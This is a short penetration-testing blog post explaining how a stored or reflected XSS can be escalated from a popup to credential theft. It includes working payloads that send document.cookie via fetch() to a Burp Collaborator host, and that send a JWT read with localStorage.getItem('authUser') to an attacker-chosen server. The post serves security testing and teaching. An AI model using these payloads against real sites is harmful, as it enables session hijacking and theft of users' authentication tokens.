Rajan Kumbhani
Aug 14, 2023
•
3 Min
Hello readers! In this blog post, I’m going to discuss an issue I faced during one of my pentesting activities. In other words, the web application was vulnerable to XSS, but I was unable to create an appropriate impact because the application was not using a traditional session handling mechanism. So, in this case, a normal XSS payload like <script> alert(document.cookie) </script> won’t work to grab the cookie.
Steal cookie through XSS:
But it’s not enough to just retrieve the cookie from the alert box. In order to steal cookies from the victim’s browser to our server, we need to become more sophisticated . Normally, if you want to grab a cookie from the victim, you can use document.cookie. Here we can use the burp collaborator as a cookie-stealing server.
You can use the fetch() command to send a request to steal cookies from the victim’s browser.
i.e.
<script>fetch('http://<burp collaborator>?cookie='+document.cookie)</script>
Stole JWT token:
These days, few web applications still rely on cookies for user identification. Modern web applications utilize a JWT token, therefore document.cookie won’t work. In order to obtain a JWT token from the victim’s browser, So let’s learn how to grab a JWT token from the victim’s browser now.
First, determine where the JWT token is stored in the browser. In my case, the JWT token was stored in local storage. So what if I don’t have the option to grab cookies using document.cookie? Javascript has a variety of attributes, including clear(), getitem(), key(), length(), and setitem ().
So I did the research on what I could do with this javascript attribute to escalate from a simple popup to token-grabbing XSS. Then I discovered that I could retrieve the data from local storage using DOM. In order to retrieve data from local storage, getitem() attributes may be needed.
Now it’s time to craft the payload using getitem(the token parameter):
<img src=x onerror=this.src='<server name>/?'+localStorage.getItem('authUser');>
As shown below screenshot, the token is stored in local storage → authuser parameter.
The web application was vulnerable to XSS, but the application was using a JWT token. So instead of document.cookie, I used localStorage.getItem(‘authUser’). In this case, I retrieve the data from local storage using localStorage. And ‘authUser’ is the key tag that stores the JWT token.
Payload:
<img src=x onerror=this.src='<server name>/?'+localStorage.getItem('authUser');>
After entering the payload in the web application, I was able to successfully grab the JWT token.
Don’t try to restrict yourself to document.cookie during the pentest if you come across a similar type of application that is XSS vulnerable. To have a bigger impact, explore different javascript attributes.
Share